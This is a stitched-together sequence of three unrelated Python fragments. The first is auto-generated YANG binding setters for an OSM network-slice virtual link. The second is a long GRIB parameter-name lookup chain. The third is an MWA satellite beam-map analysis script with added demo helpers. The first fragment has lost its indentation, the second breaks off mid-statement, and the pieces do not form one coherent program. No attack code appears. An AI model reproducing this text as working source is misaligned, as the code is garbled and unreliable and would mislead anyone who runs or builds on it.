source YANG file, then _set_vendor is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_vendor() directly.
YANG Description: Provider of the VLD.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="vendor", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """vendor must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="vendor", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)""",
})
self.__vendor = t
if hasattr(self, '_set'):
self._set()
def _unset_vendor(self):
self.__vendor = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="vendor", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)
def _get_description(self):
"""
Getter method for description, mapped from YANG variable /nst/netslice_vld/description (string)
YANG Description: Description of the VLD.
"""
return self.__description
def _set_description(self, v, load=False):
"""
Setter method for description, mapped from YANG variable /nst/netslice_vld/description (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_description is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_description() directly.
YANG Description: Description of the VLD.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """description must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)""",
})
self.__description = t
if hasattr(self, '_set'):
self._set()
def _unset_description(self):
self.__description = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)
def _get_version(self):
"""
Getter method for version, mapped from YANG variable /nst/netslice_vld/version (string)
YANG Description: Version of the VLD
"""
return self.__version
def _set_version(self, v, load=False):
"""
Setter method for version, mapped from YANG variable /nst/netslice_vld/version (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_version is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_version() directly.
YANG Description: Version of the VLD
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="version", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """version must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="version", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)""",
})
self.__version = t
if hasattr(self, '_set'):
self._set()
def _unset_version(self):
self.__version = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="version", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)
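# Editor's sketch (not generated code): every _set_* method above follows the
# same shape -- coerce the value through YANGDynClass and raise a structured
# ValueError on failure. A plain-Python analogue of that guard looks like this;
# 'coerce' stands in for the YANGDynClass(...) call.
def _checked_coerce(value, coerce, field_name):
    try:
        return coerce(value)
    except (TypeError, ValueError):
        # Report the failure with the field name, as the setters above do.
        raise ValueError({'error-string': '{} must be of a compatible type'.format(field_name)})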
def _get_type(self):
"""
Getter method for type, mapped from YANG variable /nst/netslice_vld/type (manotypes:virtual-link-type)
"""
return self.__type
def _set_type(self, v, load=False):
"""
Setter method for type, mapped from YANG variable /nst/netslice_vld/type (manotypes:virtual-link-type)
If this variable is read-only (config: false) in the
source YANG file, then _set_type is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_type() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={u'ELAN': {}, u'ELINE': {}, u'L3': {}},), is_leaf=True, yang_name="type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='manotypes:virtual-link-type', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """type must be of a type compatible with manotypes:virtual-link-type""",
'defined-type': "manotypes:virtual-link-type",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={u'ELAN': {}, u'ELINE': {}, u'L3': {}},), is_leaf=True, yang_name="type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='manotypes:virtual-link-type', is_config=True)""",
})
self.__type = t
if hasattr(self, '_set'):
self._set()
def _unset_type(self):
self.__type = YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={u'ELAN': {}, u'ELINE': {}, u'L3': {}},), is_leaf=True, yang_name="type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='manotypes:virtual-link-type', is_config=True)
def _get_root_bandwidth(self):
"""
Getter method for root_bandwidth, mapped from YANG variable /nst/netslice_vld/root_bandwidth (uint64)
YANG Description: For ELAN this is the aggregate bandwidth.
"""
return self.__root_bandwidth
def _set_root_bandwidth(self, v, load=False):
"""
Setter method for root_bandwidth, mapped from YANG variable /nst/netslice_vld/root_bandwidth (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_root_bandwidth is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_root_bandwidth() directly.
YANG Description: For ELAN this is the aggregate bandwidth.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="root-bandwidth", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """root_bandwidth must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="root-bandwidth", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='uint64', is_config=True)""",
})
self.__root_bandwidth = t
if hasattr(self, '_set'):
self._set()
def _unset_root_bandwidth(self):
self.__root_bandwidth = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="root-bandwidth", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='uint64', is_config=True)
def _get_leaf_bandwidth(self):
"""
Getter method for leaf_bandwidth, mapped from YANG variable /nst/netslice_vld/leaf_bandwidth (uint64)
YANG Description: For ELAN this is the bandwidth of branches.
"""
return self.__leaf_bandwidth
def _set_leaf_bandwidth(self, v, load=False):
"""
Setter method for leaf_bandwidth, mapped from YANG variable /nst/netslice_vld/leaf_bandwidth (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_leaf_bandwidth is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_leaf_bandwidth() directly.
YANG Description: For ELAN this is the bandwidth of branches.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="leaf-bandwidth", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """leaf_bandwidth must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="leaf-bandwidth", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='uint64', is_config=True)""",
})
self.__leaf_bandwidth = t
if hasattr(self, '_set'):
self._set()
def _unset_leaf_bandwidth(self):
self.__leaf_bandwidth = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="leaf-bandwidth", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='uint64', is_config=True)
def _get_provider_network(self):
"""
Getter method for provider_network, mapped from YANG variable /nst/netslice_vld/provider_network (container)
YANG Description: Container for the provider network.
"""
return self.__provider_network
def _set_provider_network(self, v, load=False):
"""
Setter method for provider_network, mapped from YANG variable /nst/netslice_vld/provider_network (container)
If this variable is read-only (config: false) in | |
41:
return 'swval3'
if table2Version == 171 and indicatorOfParameter == 40:
return 'swval2'
if table2Version == 171 and indicatorOfParameter == 39:
return 'swval1'
if table2Version == 171 and indicatorOfParameter == 38:
return 'istal4'
if table2Version == 171 and indicatorOfParameter == 37:
return 'istal3'
if table2Version == 171 and indicatorOfParameter == 36:
return 'istal2'
if table2Version == 171 and indicatorOfParameter == 35:
return 'istal1'
if table2Version == 171 and indicatorOfParameter == 34:
return 'ssta'
if table2Version == 171 and indicatorOfParameter == 33:
return 'rsna'
if table2Version == 171 and indicatorOfParameter == 32:
return 'asna'
if table2Version == 171 and indicatorOfParameter == 31:
return 'sica'
if table2Version == 171 and indicatorOfParameter == 30:
return 'tvha'
if table2Version == 171 and indicatorOfParameter == 29:
return 'tvla'
if table2Version == 171 and indicatorOfParameter == 28:
return 'cvha'
if table2Version == 171 and indicatorOfParameter == 27:
return 'cvla'
if table2Version == 171 and indicatorOfParameter == 26:
return 'cla'
if table2Version == 171 and indicatorOfParameter == 23:
return 'ucdva'
if table2Version == 171 and indicatorOfParameter == 22:
return 'uclna'
if table2Version == 171 and indicatorOfParameter == 21:
return 'uctpa'
if table2Version == 171 and indicatorOfParameter == 14:
return 'vrwa'
if table2Version == 171 and indicatorOfParameter == 13:
return 'urwa'
if table2Version == 171 and indicatorOfParameter == 12:
return 'vdwa'
if table2Version == 171 and indicatorOfParameter == 11:
return 'udwa'
if table2Version == 171 and indicatorOfParameter == 5:
return 'septa'
if table2Version == 171 and indicatorOfParameter == 4:
return 'epta'
if table2Version == 171 and indicatorOfParameter == 3:
return 'pta'
if table2Version == 171 and indicatorOfParameter == 2:
return 'vpota'
if table2Version == 171 and indicatorOfParameter == 1:
return 'strfa'
if table2Version == 170 and indicatorOfParameter == 179:
return 'ttr'
if table2Version == 170 and indicatorOfParameter == 171:
return 'swl2'
if table2Version == 170 and indicatorOfParameter == 149:
return 'tsw'
if table2Version == 162 and indicatorOfParameter == 255:
return '~'
if table2Version == 162 and indicatorOfParameter == 233:
return '~'
if table2Version == 162 and indicatorOfParameter == 232:
return '~'
if table2Version == 162 and indicatorOfParameter == 231:
return '~'
if table2Version == 162 and indicatorOfParameter == 230:
return '~'
if table2Version == 162 and indicatorOfParameter == 229:
return '~'
if table2Version == 162 and indicatorOfParameter == 227:
return '~'
if table2Version == 162 and indicatorOfParameter == 226:
return '~'
if table2Version == 162 and indicatorOfParameter == 225:
return '~'
if table2Version == 162 and indicatorOfParameter == 224:
return '~'
if table2Version == 162 and indicatorOfParameter == 223:
return '~'
if table2Version == 162 and indicatorOfParameter == 222:
return '~'
if table2Version == 162 and indicatorOfParameter == 221:
return '~'
if table2Version == 162 and indicatorOfParameter == 220:
return '~'
if table2Version == 162 and indicatorOfParameter == 219:
return '~'
if table2Version == 162 and indicatorOfParameter == 218:
return '~'
if table2Version == 162 and indicatorOfParameter == 217:
return '~'
if table2Version == 162 and indicatorOfParameter == 216:
return '~'
if table2Version == 162 and indicatorOfParameter == 215:
return '~'
if table2Version == 162 and indicatorOfParameter == 214:
return '~'
if table2Version == 162 and indicatorOfParameter == 213:
return '~'
if table2Version == 162 and indicatorOfParameter == 212:
return '~'
if table2Version == 162 and indicatorOfParameter == 211:
return '~'
if table2Version == 162 and indicatorOfParameter == 210:
return '~'
if table2Version == 162 and indicatorOfParameter == 209:
return '~'
if table2Version == 162 and indicatorOfParameter == 208:
return '~'
if table2Version == 162 and indicatorOfParameter == 207:
return '~'
if table2Version == 162 and indicatorOfParameter == 206:
return '~'
if table2Version == 162 and indicatorOfParameter == 113:
return 'vtpha'
if table2Version == 162 and indicatorOfParameter == 112:
return 'utpha'
if table2Version == 162 and indicatorOfParameter == 111:
return 'qtpha'
if table2Version == 162 and indicatorOfParameter == 110:
return 'ttpha'
if table2Version == 162 and indicatorOfParameter == 109:
return 'tdcha'
if table2Version == 162 and indicatorOfParameter == 108:
return 'tpfa'
if table2Version == 162 and indicatorOfParameter == 107:
return 'ddra'
if table2Version == 162 and indicatorOfParameter == 106:
return 'udra'
if table2Version == 162 and indicatorOfParameter == 105:
return 'dmfa'
if table2Version == 162 and indicatorOfParameter == 104:
return 'umfa'
if table2Version == 162 and indicatorOfParameter == 103:
return 'trtca'
if table2Version == 162 and indicatorOfParameter == 102:
return 'srtca'
if table2Version == 162 and indicatorOfParameter == 101:
return 'trta'
if table2Version == 162 and indicatorOfParameter == 100:
return 'srta'
if table2Version == 162 and indicatorOfParameter == 87:
return 'viozd'
if table2Version == 162 and indicatorOfParameter == 86:
return 'vitoed'
if table2Version == 162 and indicatorOfParameter == 85:
return 'vigd'
if table2Version == 162 and indicatorOfParameter == 84:
return 'viwvd'
if table2Version == 162 and indicatorOfParameter == 83:
return 'vithed'
if table2Version == 162 and indicatorOfParameter == 82:
return 'viked'
if table2Version == 162 and indicatorOfParameter == 81:
return 'vimad'
if table2Version == 162 and indicatorOfParameter == 78:
return 'viozn'
if table2Version == 162 and indicatorOfParameter == 77:
return 'vioze'
if table2Version == 162 and indicatorOfParameter == 76:
return 'vitoen'
if table2Version == 162 and indicatorOfParameter == 75:
return 'vitoee'
if table2Version == 162 and indicatorOfParameter == 74:
return 'vign'
if table2Version == 162 and indicatorOfParameter == 73:
return 'vige'
if table2Version == 162 and indicatorOfParameter == 72:
return 'viwvn'
if table2Version == 162 and indicatorOfParameter == 71:
return 'viwve'
if table2Version == 162 and indicatorOfParameter == 70:
return 'vithen'
if table2Version == 162 and indicatorOfParameter == 69:
return 'vithee'
if table2Version == 162 and indicatorOfParameter == 68:
return 'viken'
if table2Version == 162 and indicatorOfParameter == 67:
return 'vikee'
if table2Version == 162 and indicatorOfParameter == 66:
return 'viman'
if table2Version == 162 and indicatorOfParameter == 65:
return 'vimae'
if table2Version == 162 and indicatorOfParameter == 64:
return 'viec'
if table2Version == 162 and indicatorOfParameter == 63:
return 'vitoe'
if table2Version == 162 and indicatorOfParameter == 62:
return 'vipile'
if table2Version == 162 and indicatorOfParameter == 61:
return 'vipie'
if table2Version == 162 and indicatorOfParameter == 60:
return 'vithe'
if table2Version == 162 and indicatorOfParameter == 59:
return 'vike'
if table2Version == 162 and indicatorOfParameter == 58:
return 'vioz'
if table2Version == 162 and indicatorOfParameter == 57:
return 'viiw'
if table2Version == 162 and indicatorOfParameter == 56:
return 'vilw'
if table2Version == 162 and indicatorOfParameter == 55:
return 'viwv'
if table2Version == 162 and indicatorOfParameter == 54:
return 'vit'
if table2Version == 162 and indicatorOfParameter == 53:
return 'vima'
if table2Version == 162 and indicatorOfParameter == 51:
return '~'
if table2Version == 160 and indicatorOfParameter == 254:
return 'hsdrea'
if table2Version == 160 and indicatorOfParameter == 249:
return '~'
if table2Version == 160 and indicatorOfParameter == 247:
return 'moflrea'
if table2Version == 160 and indicatorOfParameter == 246:
return '10wsrea'
if table2Version == 160 and indicatorOfParameter == 243:
return 'falrea'
if table2Version == 160 and indicatorOfParameter == 242:
return 'ccrea'
if table2Version == 160 and indicatorOfParameter == 241:
return 'clwcerrea'
if table2Version == 160 and indicatorOfParameter == 240:
return 'lsfrea'
if table2Version == 160 and indicatorOfParameter == 239:
return 'csfrea'
if table2Version == 160 and indicatorOfParameter == 231:
return 'ishfrea'
if table2Version == 160 and indicatorOfParameter == 226:
return 'wwrea'
if table2Version == 160 and indicatorOfParameter == 225:
return 'wvrea'
if table2Version == 160 and indicatorOfParameter == 224:
return 'wurea'
if table2Version == 160 and indicatorOfParameter == 223:
return 'wqrea'
if table2Version == 160 and indicatorOfParameter == 222:
return 'wtrea'
if table2Version == 160 and indicatorOfParameter == 221:
return 'wzrea'
if table2Version == 160 and indicatorOfParameter == 220:
return 'vvrea'
if table2Version == 160 and indicatorOfParameter == 219:
return 'vurea'
if table2Version == 160 and indicatorOfParameter == 218:
return 'vqrea'
if table2Version == 160 and indicatorOfParameter == 217:
return 'vtrea'
if table2Version == 160 and indicatorOfParameter == 216:
return 'vzrea'
    if table2Version == 160 and indicatorOfParameter ==
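# Hedged sketch, not part of the original generated table: the long chain of
# if/return pairs above amounts to a lookup keyed on
# (table2Version, indicatorOfParameter). Only a handful of the entries visible
# above are reproduced here for illustration; '~' is the fallback the original
# code returns for unnamed parameters.
_SHORT_NAME_TABLE = {
    (162, 113): 'vtpha',
    (162, 112): 'utpha',
    (162, 100): 'srta',
    (160, 254): 'hsdrea',
    (160, 246): '10wsrea',
}

def _short_name_lookup(table2Version, indicatorOfParameter, default='~'):
    """Illustrative table-driven equivalent of the if/return chain above."""
    return _SHORT_NAME_TABLE.get((table2Version, indicatorOfParameter), default)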
# Repository: amanchokshi/mwa-satellites
import numpy as np
import healpy as hp
import scipy.optimize as opt
import numpy.polynomial.polynomial as poly
def hp_slices_horizon(nside=None):
"""Healpix pix indices of NS, EW slices and above horizon"""
# theta phi values of each pixel
hp_indices = np.arange(hp.nside2npix(nside))
θ, ɸ = hp.pix2ang(nside, hp_indices)
    # healpix indices above the horizon (here, zenith angle <= 80 degrees)
    above_horizon_indices = np.where(θ <= np.radians(80))[0]
# pixel coords above the horizon
ɸ_above_horizon = ɸ[above_horizon_indices]
NS_indices = []
EW_indices = []
# pixel indices along N, E, S, W slices
# order the indices such that they proceed from N -> S or E -> W
n_slice = sorted(
np.where((np.round(np.degrees(ɸ_above_horizon))) == 45)[0], reverse=True
)
e_slice = sorted(
np.where((np.round(np.degrees(ɸ_above_horizon))) == 135)[0], reverse=True
)
s_slice = sorted(np.where((np.round(np.degrees(ɸ_above_horizon))) == 225)[0])
w_slice = sorted(np.where((np.round(np.degrees(ɸ_above_horizon))) == 315)[0])
NS_indices.extend(n_slice)
NS_indices.extend(s_slice)
EW_indices.extend(e_slice)
EW_indices.extend(w_slice)
return [NS_indices, EW_indices, above_horizon_indices]
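# Hedged usage sketch (not part of the original script): the three index lists
# returned above select the N-S slice, the E-W slice, and every pixel within
# the 80-degree zenith-angle cut. nside=32 matches the script's default.
def _demo_hp_slices_horizon(nside=32):
    """Illustrative only: report how many pixels fall in each slice."""
    NS_indices, EW_indices, above_horizon = hp_slices_horizon(nside=nside)
    return len(NS_indices), len(EW_indices), len(above_horizon)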
def slice_map(hp_map):
"""slices healpix map along NS, EW"""
NS_indices, EW_indices, _ = hp_slices_horizon(nside)
θ_NS, ɸ_NS = np.degrees(hp.pix2ang(nside, NS_indices))
θ_EW, ɸ_EW = np.degrees(hp.pix2ang(nside, EW_indices))
zenith_angle_NS = []
for i, j in zip(θ_NS, ɸ_NS):
if j <= 180:
zenith_angle_NS.append(-1 * i)
else:
zenith_angle_NS.append(i)
zenith_angle_EW = []
for i, j in zip(θ_EW, ɸ_EW):
if j <= 180:
zenith_angle_EW.append(-1 * i)
else:
zenith_angle_EW.append(i)
NS_data = [hp_map[NS_indices], zenith_angle_NS]
EW_data = [hp_map[EW_indices], zenith_angle_EW]
return [NS_data, EW_data]
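# Hedged usage sketch (not part of the original script): slice_map returns
# [values, signed zenith angles] for the N-S and E-W cuts. It relies on the
# module-level `nside` set in the __main__ block below.
def _demo_slice_map(hp_map):
    """Illustrative only: unpack the N-S and E-W slices of a healpix map."""
    (NS_vals, NS_za), (EW_vals, EW_za) = slice_map(hp_map)
    return NS_vals, NS_za, EW_vals, EW_za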
def nan_mad(ref_map):
"""Compute mad while ignoring nans"""
ref_map_mad = []
for j in ref_map:
if j != []:
j = np.asarray(j)
j = j[~np.isnan(j)]
ref_map_mad.append(mad(j))
else:
ref_map_mad.append(np.nan)
ref_map_mad = np.asarray(ref_map_mad)
    # np.nan never compares equal to itself, so use np.isnan to find missing values
    ref_map_mad[np.isnan(ref_map_mad)] = np.nanmean(ref_map_mad)
return ref_map_mad
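# Hedged usage sketch (not part of the original script): nan_mad accepts a
# ragged list of per-pixel samples; empty pixels come back as the mean MAD.
# It depends on the `mad` import made in the __main__ block below.
def _demo_nan_mad():
    """Illustrative only: MAD of a small ragged pixel list containing NaNs."""
    samples = [[1.0, 2.0, np.nan, 3.0], [], [4.0, 4.5, 5.0]]
    return nan_mad(samples)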
def good_maps(ref_map):
"""Creates a ref map with only good satellites"""
pointings = ["0", "2", "4"]
# load data from map .npz file
f = Path(f"{map_dir}/{ref_map}")
tile_data = np.load(f, allow_pickle=True)
tile_data = {key: tile_data[key].item() for key in tile_data}
ref_map = tile_data["ref_map"]
# Good sats from which to make plots
good_sats = [
25338,
25984,
25985,
28654,
40086,
40087,
40091,
41179,
41180,
41182,
41183,
41184,
41185,
41187,
41188,
41189,
44387,
]
# Empty good map
good_map = [[] for pixel in range(hp.nside2npix(nside))]
for p in pointings:
# append to good map from all good sat data
for sat in good_sats:
for pix in range(hp.nside2npix(nside)):
good_map[pix].extend(ref_map[p][sat][pix])
return good_map
def ref_map_slice(good_map):
"""slices ref healpix map along NS & EW"""
ref_map_NS, ref_map_EW = slice_map(np.asarray(good_map))
ref_med_map_NS = np.asarray(
[(np.nanmedian(i) if i != [] else np.nan) for i in ref_map_NS[0]]
)
    # Scale the median map so that its maximum value is 0 dB
ref_med_map_scaled_NS = np.asarray(
[i - np.nanmax(ref_med_map_NS) for i in ref_med_map_NS]
)
# ref_mad_map_NS = np.asarray([mad(i) for i in ref_map_NS[0]])
ref_mad_map_NS = np.asarray(nan_mad(ref_map_NS[0]))
za_NS = ref_map_NS[1]
ref_med_map_EW = np.asarray(
[(np.nanmedian(i) if i != [] else np.nan) for i in ref_map_EW[0]]
)
    # Scale the median map so that its maximum value is 0 dB
ref_med_map_scaled_EW = np.asarray(
[i - np.nanmax(ref_med_map_EW) for i in ref_med_map_EW]
)
# ref_mad_map_EW = np.asarray([mad(i) for i in ref_map_EW[0]])
ref_mad_map_EW = np.asarray(nan_mad(ref_map_EW[0]))
za_EW = ref_map_EW[1]
NS_data = [ref_med_map_scaled_NS, ref_mad_map_NS, za_NS]
EW_data = [ref_med_map_scaled_EW, ref_mad_map_EW, za_EW]
return [NS_data, EW_data]
# rotate func written by <NAME>
def rotate(nside, angle=None, healpix_array=None, savetag=None, flip=False):
"""Takes in a healpix array, rotates it by the desired angle, and saves it.
Optionally flip the data, changes east-west into west-east because
astronomy"""
# theta phi values of each pixel
hp_indices = np.arange(hp.nside2npix(nside))
θ, ɸ = hp.pix2ang(nside, hp_indices)
new_hp_inds = hp.ang2pix(nside, θ, ɸ + angle)
    # Flip the data east-west to match astro conventions
    if flip:
        new_angles = []
        for phi in ɸ:
            if phi <= np.pi:
                new_angles.append(np.pi - phi)
            else:
                new_angles.append(3 * np.pi - phi)
        # keep the colatitude θ unchanged; only the azimuth is mirrored
        new_hp_inds = hp.ang2pix(nside, θ, np.asarray(new_angles))
    # Save the array in the new order
if savetag:
np.savez_compressed(savetag, beammap=healpix_array[new_hp_inds])
return healpix_array[new_hp_inds]
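# Hedged usage sketch (not part of the original script): rotate a healpix map
# by +45 degrees in azimuth without flipping or saving, mirroring how the
# reference tile maps are rotated in the __main__ block below.
def _demo_rotate(healpix_array, nside=32):
    """Illustrative only: rotate a map by pi/4 in azimuth."""
    return rotate(nside, angle=np.pi / 4.0, healpix_array=healpix_array)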
# chisquared minimization to best fit map to data
def fit_gain(map_data=None, map_error=None, beam=None):
"""Fit the beam model to the measured data using
chisquared minimization"""
bad_values = np.isnan(map_data)
map_data = map_data[~bad_values]
map_error = map_error[~bad_values]
map_error[np.where(map_error == 0)] = np.mean(map_error)
def chisqfunc(gain):
model = beam[~bad_values] + gain
chisq = sum((map_data - model) ** 2)
# chisq = sum(((map_data - model)/map_error)**2)
return chisq
x0 = np.array([0])
result = opt.minimize(chisqfunc, x0)
return result.x
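# Hedged usage sketch (not part of the original script): fit a single gain
# offset of a beam-model slice to a measured slice, then form the
# data-minus-model residuals that plt_slice displays.
def _demo_fit_residual(map_slice, map_error, beam_slice):
    """Illustrative only: residuals after a scalar gain fit."""
    gain = fit_gain(map_data=map_slice, map_error=map_error, beam=beam_slice)
    return map_slice - (beam_slice + gain)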
def poly_fit(x, y, map_data, order):
"""Fit polynominal of order to data"""
x = np.asarray(x)
y = np.asarray(y)
bad_values = np.isnan(map_data)
x_good = x[~bad_values]
y_good = y[~bad_values]
coefs = poly.polyfit(x_good, y_good, order)
fit = poly.polyval(x, coefs)
return fit
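# Hedged usage sketch (not part of the original script): poly_fit masks pixels
# where map_data is NaN before fitting. A cubic here is purely illustrative;
# the order used by the original script is not shown in this excerpt.
def _demo_poly_fit(zen_angle, delta_pow, map_slice, order=3):
    """Illustrative only: low-order polynomial fit to slice residuals."""
    return poly_fit(zen_angle, delta_pow, map_slice, order)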
def plt_slice(
fig=None,
sub=(None, None, None),
zen_angle=None,
map_slice=None,
map_error=None,
model_slice=None,
delta_pow=None,
pow_fit=None,
slice_label=None,
model_label=None,
ylabel=True,
title=None,
):
"""Plot a slice of the beam, with measured
data, errorbars, and fit the simulated beam
to the data. Also plot the diff b/w data and
the model"""
ax = fig.add_subplot(sub[0], sub[1], sub[2])
ax.errorbar(
zen_angle,
map_slice,
yerr=map_error,
fmt=".",
color="#a8df65",
ecolor="#7da87b",
elinewidth=2.1,
capsize=2.1,
capthick=2.6,
alpha=0.9,
ms=7,
label=slice_label,
)
ax.plot(
zen_angle,
model_slice,
color="#c70039",
linewidth=2.1,
alpha=0.9,
label=model_label,
)
ax.text(0.02, 0.88, title, horizontalalignment="left", transform=ax.transAxes)
# ax.set_ylim(bottom=-30)
# ax.set_xlabel('Zenith Angle (degrees)')
# ax.legend(loc='lower center')
leg = ax.legend(loc="lower center", frameon=True, framealpha=0.3, handlelength=1)
leg.get_frame().set_facecolor("white")
for l in leg.legendHandles:
l.set_alpha(1)
for text in leg.get_texts():
plt.setp(text, color="w")
ax.set_xlim([-82, 82])
ax.set_ylim([-26, 12])
ax.set_xticklabels([])
divider = make_axes_locatable(ax)
dax = divider.append_axes("bottom", size="30%", pad=0.1)
# dax = fig.add_subplot(2,1,2)
dax.scatter(zen_angle, delta_pow, marker=".", s=42, color="#63b7af")
dax.plot(zen_angle, pow_fit, linewidth=2.1, alpha=0.9, color="#ff8264")
dax.set_xlim([-82, 82])
dax.set_xticklabels([])
dax.set_ylim([-5, 5])
if ylabel is True:
ax.set_ylabel("Power [dB]")
dax.set_ylabel(r"$\Delta$ref [dB]")
# dax.set_ylabel('Data - Model (dB)')
else:
dax.set_yticklabels([])
ax.set_yticklabels([])
return ax
def plt_null_test(
fig=None,
sub=(None, None, None),
zen_angle=None,
del_pow=None,
del_err=None,
del_beam=None,
del_fit=None,
null_label=None,
beam_label=None,
fit_label=None,
ylabel=True,
title=None,
):
"""Plot graphs for a null test"""
ax = fig.add_subplot(sub[0], sub[1], sub[2])
ax.errorbar(
zen_angle,
del_pow,
yerr=del_err,
fmt=".",
color="#a8df65",
ecolor="#7da87b",
elinewidth=2.1,
capsize=2.1,
capthick=2.6,
alpha=0.9,
ms=7,
label=null_label,
)
ax.text(0.02, 0.9, title, horizontalalignment="left", transform=ax.transAxes)
ax.plot(
zen_angle, del_beam, color="#c70039", linewidth=2.1, alpha=0.9, label=beam_label
)
ax.plot(
zen_angle, del_fit, color="#ff8264", linewidth=2.1, alpha=0.9, label=fit_label
)
ax.set_xlim([-82, 82])
ax.set_ylim([-10, 10])
ax.set_xlabel("Zenith Angle [degrees]")
# ax.legend(loc='upper left')
leg = ax.legend(loc="lower left", frameon=True, framealpha=0.3, handlelength=1)
leg.get_frame().set_facecolor("white")
for l in leg.legendHandles:
l.set_alpha(1)
for text in leg.get_texts():
plt.setp(text, color="w")
if ylabel is True:
ax.set_ylabel("Power [dB]")
else:
ax.set_yticklabels([])
return ax
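# Hedged usage sketch (not part of the original script): draw one null-test
# panel on its own figure. All labels are illustrative; `plt` is imported in
# the __main__ block below.
def _demo_null_test_panel(zen_angle, del_pow, del_err, del_beam, del_fit):
    """Illustrative only: a single-panel call to plt_null_test."""
    fig = plt.figure(figsize=(6, 5))
    plt_null_test(
        fig=fig,
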